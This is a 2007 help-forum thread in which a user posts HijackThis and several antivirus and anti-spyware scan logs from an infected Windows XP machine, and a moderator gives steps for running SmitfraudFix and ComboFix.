R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.co.in/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = iexplore
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: DAPHelper Class - {0000CC75-ACF3-4cac-A0A9-DD3868E06852} - D:\Program Files\DAP\DAPBHO.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {481E7983-1F2B-4250-951A-44E0902DF978} - (no file)
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: (no name) - {68D5CF1D-EC5C-4bdd-A9EF-F0E517565D50} - (no file)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: (no name) - {F2496031-4FE4-497E-8F75-04E0A180366E} - C:\WINDOWS\System32\vtsqn.dll (file missing)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: DAP Bar - {62999427-33FC-4baf-9C9C-BCE6BD127F08} - D:\Program Files\DAP\DAPIEBar.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SMSERIAL] sm56hlpr.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SWN2] C:\Program Files\Spyware Nuker\swnxt.exe /h
O4 - HKLM\..\Run: [DSLSTATEXE] C:\Program Files\GlobespanVirata\Adsl\dslstat.exe icon
O4 - HKLM\..\Run: [DSLAGENTEXE] C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKLM\..\Run: [MailScan Dispatcher] "C:\Program Files\eScan\LAUNCH.EXE"
O4 - HKLM\..\Run: [eScan Updater] C:\PROGRA~1\eScan\TRAYICOS.EXE /App
O4 - HKLM\..\Run: [eScan Monitor] C:\PROGRA~1\eScan\AVPMWrap.EXE
O4 - HKLM\..\Run: [staeck12] C:\WINDOWS\system32\mfcee.exe
O4 - HKLM\..\Run: [melg34] C:\Documents and Settings\Sys\4.exe
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [Skype] "D:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKCU\..\Run: [staeck12] C:\WINDOWS\system32\mfcee.exe
O4 - HKCU\..\Run: [melg34] C:\Documents and Settings\Sys\4.exe
O4 - HKCU\..\Run: [SUPERAntiSpyware] D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Samsung Multimedia Keyboard.lnk = ?
O8 - Extra context menu item: &Download with &DAP - D:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Advanced Email Extractor - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html
O8 - Extra context menu item: Download &all with DAP - D:\PROGRA~1\DAP\dapextie2.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://D:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Scan link with AEE - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/link.html
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Run DAP - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - D:\PROGRA~1\DAP\DAP.EXE
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra button: Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O9 - Extra 'Tools' menuitem: Advanced Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://download.bitdefender.com/resources/scan8/oscan8.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{17BBF687-1141-4522-B007-EF63C7F4B7EE}: NameServer = 202.54.6.60,202.54.29.5
O17 - HKLM\System\CCS\Services\Tcpip\..\{7A1DA16E-B943-4E3A-A5A8-FF298FFD2041}: NameServer = 202.54.29.5 202.54.6.60
O20 - Winlogon Notify: !SASWinLogon - D:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: eScan Server-Updater (eScan-trayicos) - MicroWorld Technologies Inc. - C:\PROGRA~1\eScan\TRAYSSER.EXE
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: eScan Monitor Service (KAVMonitorService) - Kaspersky Labs. - C:\PROGRA~1\eScan\avpm.exe
O23 - Service: MWAgent - MicroWorld Technologies Inc. - C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe

2) BIT DEFENDER REPORT:
BitDefender Online Scanner - Real Time Virus ReportBitDefender Online
Scanner - Real Time Virus Report
Generated at: Tue, Feb 06, 2007 - 14:51:55




Scan Info
Scanned Files621382
Infected Files378


Virus Detected
DeepScan:Generic.Malware.SYBddldg.26A600B35
Trojan.Agent.ACL1
Backdoor.Rbot.FGD4
DeepScan:Generic.Malware.SYddldg.855620B12
Backdoor.Sdbot.W1
MemScan:Trojan.Vundo.W3
BehavesLike:Win32.FileInfector12
Trojan.Downloader.Conhook.D4
Trojan.Juan.E2
Trojan.Virtumod.EB9
DeepScan:Generic.Malware.SYddldg.21FE268A287
DeepScan:Generic.Malware.SYddldg.23F1AE3A42
Backdoor.Rbot.BDQ5
Generic.Botget.930D50D41





This summary of the scan process will be used by the BitDefender Antivirus
Lab to create agregate statistics about virus activity around the world.


3) SUPER ANTIVIRUS SCAN REPORT
SUPERAntiSpyware Scan Log
Generated 02/06/2007 at 03:36 PM

Application Version : 3.5.1016

Core Rules Database Version : 3178
Trace Rules Database Version: 1188

Scan type : Complete Scan
Total Scan Time : 00:17:47

Memory items scanned : 478
Memory threats detected : 1
Registry items scanned : 6149
Registry threats detected : 8
File items scanned : 25650
File threats detected : 96

Trojan.SVCCHost
C:\WINDOWS\SYSTEM32\SVCCHOST.EXE
C:\WINDOWS\SYSTEM32\SVCCHOST.EXE
[msvcc25] C:\WINDOWS\SYSTEM32\SVCCHOST.EXE
[msvcc25] C:\WINDOWS\SYSTEM32\SVCCHOST.EXE

Adware.Tracking Cookie
C:\Documents and Settings\Sys\Cookies\sys@1072664508[1].txt
C:\Documents and Settings\Sys\Cookies\sys@indexstats[2].txt
C:\Documents and Settings\Sys\Cookies\sys@mediaplex[1].txt
C:\Documents and Settings\Sys\Cookies\sys@www.freesexyindians[3].txt
C:\Documents and Settings\Sys\Cookies\sys@1069251633[1].txt
C:\Documents and Settings\Sys\Cookies\sys@www.winantispyware[1].txt
C:\Documents and Settings\Sys\Cookies\sys@doubleclick[2].txt
C:\Documents and Settings\Sys\Cookies\sys@adrevolver[1].txt
C:\Documents and Settings\Sys\Cookies\sys@tribalfusion[1].txt
C:\Documents and Settings\Sys\Cookies\sys@1066815633[1].txt
C:\Documents and Settings\Sys\Cookies\sys@fastclick[2].txt
C:\Documents and Settings\Sys\Cookies\sys@cbs.112.2o7[1].txt
C:\Documents and Settings\Sys\Cookies\sys@adrevolver[2].txt
C:\Documents and Settings\Sys\Cookies\sys@stats1.reliablestats[2].txt
C:\Documents and Settings\Sys\Cookies\sys@winantivirus[2].txt
C:\Documents and Settings\Sys\Cookies\sys@casalemedia[2].txt
C:\Documents and Settings\Sys\Cookies\sys@bs.serving-sys[2].txt
C:\Documents and Settings\Sys\Cookies\sys@atdmt[2].txt
C:\Documents and Settings\Sys\Cookies\sys@www.amaena[2].txt
C:\Documents and Settings\Sys\Cookies\sys@serving-sys[1].txt
C:\Documents and Settings\Sys\Cookies\sys@adbrite[2].txt
C:\Documents and Settings\Sys\Cookies\sys@1069738494[1].txt
C:\Documents and Settings\Sys\Cookies\sys@www.winantivirus[1].txt
C:\Documents and Settings\Sys\Cookies\sys@adserver[1].txt
C:\Documents and Settings\Sys\Cookies\sys@ad.parachat[2].txt
C:\Documents and Settings\Sys\Cookies\sys@ads.realtechnetwork[2].txt
C:\Documents and Settings\Sys\Cookies\sys@overture[1].txt
C:\Documents and Settings\Sys\Cookies\sys@winantispyware[2].txt
C:\Documents and Settings\Sys\Cookies\sys@pro-market[1].txt
C:\Documents and Settings\Sys\Cookies\sys@ad.yieldmanager[1].txt
C:\Documents and Settings\Sys\Cookies\sys@www.freesexyindians[1].txt

Adware.Vundo Variant
HKCR\CLSID\{68D5CF1D-EC5C-4BDD-A9EF-F0E517565D50}
HKCR\CLSID\{68D5CF1D-EC5C-4BDD-A9EF-F0E517565D50}\InprocServer32
HKCR\CLSID\{68D5CF1D-EC5C-4BDD-A9EF-F0E517565D50}\InprocServer32#ThreadingModel

Unclassified.Unknown Origin
HKCR\CLSID\{481E7983-1F2B-4250-951A-44E0902DF978}
HKCR\CLSID\{481E7983-1F2B-4250-951A-44E0902DF978}\InprocServer32
HKCR\CLSID\{481E7983-1F2B-4250-951A-44E0902DF978}\InprocServer32#ThreadingModel

Malware.SpywareNuker
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP201\A0048059.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP202\A0048076.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP203\A0048077.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP203\A0048086.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP204\A0048103.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP204\A0048133.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP204\A0048146.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP204\A0048174.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP205\A0048191.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP205\A0048213.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP205\A0048223.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP205\A0048236.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP205\A0048256.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP205\A0048265.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP205\A0048275.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP206\A0048290.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP206\A0048299.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP206\A0048318.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP206\A0048349.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP206\A0048363.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP207\A0048373.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP207\A0048382.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP207\A0048410.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP207\A0048429.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP207\A0048460.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049458.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049470.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049484.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049503.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049512.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049560.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049598.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049633.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049650.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049663.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP208\A0049682.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP209\A0049705.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP209\A0049751.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP209\A0049767.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP209\A0049806.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP209\A0049821.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP210\A0050822.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP210\A0051821.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP210\A0051835.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0051851.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0051865.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0051892.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0051931.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0052055.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0052077.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0052118.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0052154.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053389.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053403.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053418.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053465.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053497.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053530.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053552.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053568.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053584.SYS
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053601.SYS
C:\WINDOWS\SYSTEM32\DRIVERS\PSHOOK11.SYS

Trojan.Downloader-WBRock
C:\SYSTEM VOLUME INFORMATION\_RESTORE{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053645.EXE


4) AVG ANTI-SPYWARE SCAN REPORT:
---------------------------------------------------------
AVG Anti-Spyware - Scan Report
---------------------------------------------------------

+ Created at: 4:47:46 PM 2/6/2007

+ Scan result:



C:\WINDOWS\system32\ajj.exe -> Adware.Aureate : Ignored.
HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{c95fe080-8f5d-11d2-a20b-00aa003c157a} -> Adware.Generic : Ignored.
[352] C:\WINDOWS\System32\mysvcc.exe -> Backdoor.Rbot.aeu : Cleaned with backup (quarantined).
C:\Documents and Settings\Sys\Cookies\sys@trafic[1].txt -> TrackingCookie.Trafic : Cleaned.


::Report end
Go to the top of the page
 
+Quote Post
rridgely
post Feb 7 2007, 12:04 AM
Post #6


I hate computers
Group Icon

Group: Moderators
Posts: 8,645
Joined: 12-April 05
Member No.: 1,352
Please download SmitfraudFix (by S!Ri)
Extract the content (a folder named SmitfraudFix) to your Desktop.

Open the SmitfraudFix folder and double-click smitfraudfix.cmd
Select option #1 - Search by typing 1 and press "Enter"; a text file will appear, which lists infected files (if present).
Please copy/paste the content of that report into your next reply.

-------

Download this file - combofix.exe and save it to your desktop.
Double click combofix.exe & follow the prompts.
When it's finished, it will produce a log of what it found. Please post the contents of that log in your next reply

Note:
Do not mouseclick combofix's window whilst it's running as it may cause it to stall

In your next post I want a combofix log, smitfraud log, and a new hijackthis log.


--------------------
Having problems with spyware and viruses? If so then please follow the Spyware Removal Guide

Want to know how to protect your clean computer from viruses and spyware? The please follow the Malware Prevention Guide

Looking for good free security software?(or other great free stuff) The please take a look at the Recommended Security Applications Guide
Go to the top of the page
 
+Quote Post
Buchi
post Feb 8 2007, 10:40 AM
Post #7


Member
**

Group: Members
Posts: 16
Joined: 4-February 07
Member No.: 10,964
Thanks rridgely, after extracting Smitfraudfix, I double clicked smitfraudfix.cmd. But I got a error message "Reboot.exe file is missing!".
Later when I checked, I couldn't extract "reboot.exe" file. I could see reboot.exe in the winzip window, but this particular file is not getting extracted though I tried in different methods. Any suggestions where I am wrong!
Go to the top of the page
 
+Quote Post
Buchi
post Feb 8 2007, 01:11 PM
Post #8


Member
**

Group: Members
Posts: 16
Joined: 4-February 07
Member No.: 10,964
LATER I COULD FIND THE VIRUS SOFTWARE THAT IS STOPPING THE EXTRACTION OF "REBOOT.EXE". I DISABLED THAT SOFTWARE AND FOLLOWED YOUR INSTRUCTIONS, BELOW ARE THE REPORTS. PLEASE STUDY AND ADVISE THE NEXT STEP, THANKS.

1) SMITFRAUDFIX REPORT:
SmitFraudFix v2.141

Scan done at 16:18:52.46, Thu 02/08/2007
Run from C:\Documents and Settings\Sys\Desktop\SmitfraudFix
OS: Microsoft Windows XP [Version 5.1.2600] - Windows_NT
The filesystem type is NTFS
Fix run in normal mode

»»»»»»»»»»»»»»»»»»»»»»»» hosts


»»»»»»»»»»»»»»»»»»»»»»»» C:\


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\system


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\Web


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\system32


»»»»»»»»»»»»»»»»»»»»»»»» C:\Documents and Settings\Sys


»»»»»»»»»»»»»»»»»»»»»»»» C:\Documents and Settings\Sys\Application Data


»»»»»»»»»»»»»»»»»»»»»»»» Start Menu


»»»»»»»»»»»»»»»»»»»»»»»» C:\DOCUME~1\Sys\FAVORI~1


»»»»»»»»»»»»»»»»»»»»»»»» Desktop


»»»»»»»»»»»»»»»»»»»»»»»» C:\Program Files


»»»»»»»»»»»»»»»»»»»»»»»» Corrupted keys


»»»»»»»»»»»»»»»»»»»»»»»» Desktop Components

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components]
"Source"="About:Home"
"SubscribedURL"="About:Home"
"FriendlyName"="My Current Home Page"


»»»»»»»»»»»»»»»»»»»»»»»» Sharedtaskscheduler
!!!Attention, following keys are not inevitably infected!!!

SrchSTS.exe by S!Ri
Search SharedTaskScheduler's .dll


»»»»»»»»»»»»»»»»»»»»»»»» AppInit_DLLs
!!!Attention, following keys are not inevitably infected!!!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"=""


»»»»»»»»»»»»»»»»»»»»»»»» Winlogon.System
!!!Attention, following keys are not inevitably infected!!!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"System"=""


»»»»»»»»»»»»»»»»»»»»»»»» pe386-msguard-lzx32-huy32


»»»»»»»»»»»»»»»»»»»»»»»» Scanning wininet.dll infection


»»»»»»»»»»»»»»»»»»»»»»»» End


2) COMBOFIX REPORT:
"Sys" - 07-02-08 16:20:29 Service Pack 2
ComboFix 07-02-07 - Running from: "C:\Documents and Settings\Sys\Desktop"

(((((((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))


C:\WINDOWS\system32\taskmgr.com
C:\WINDOWS\REGEDIT.com


((((((((((((((((((((((((((((((( Files Created from 2007-01-08 to 2007-02-08 ))))))))))))))))))))))))))))))))))


2007-02-08 16:19 3,024 --a------ C:\WINDOWS\system32\tmp.reg
2007-02-08 16:17 79,360 --a------ C:\WINDOWS\system32\swxcacls.exe
2007-02-08 16:17 53,248 --a------ C:\WINDOWS\system32\Process.exe
2007-02-08 16:17 51,200 --a------ C:\WINDOWS\system32\dumphive.exe
2007-02-08 16:17 40,960 --a------ C:\WINDOWS\system32\swsc.exe
2007-02-08 16:17 288,417 --a------ C:\WINDOWS\system32\SrchSTS.exe
2007-02-08 16:17 135,168 --a------ C:\WINDOWS\system32\swreg.exe
2007-02-08 14:32 67,645 --a------ C:\WINDOWS\system32\drivers\pshook11.sys
2007-02-06 16:01 3,968 --a------ C:\WINDOWS\system32\drivers\AvgAsCln.sys
2007-02-06 15:22 0 --a------ C:\WINDOWS\system32\CMMGR32.EXE
2007-02-06 15:15 <DIR> d-------- C:\DOCUME~1\Sys\Application Data\SUPERAntiSpyware.com
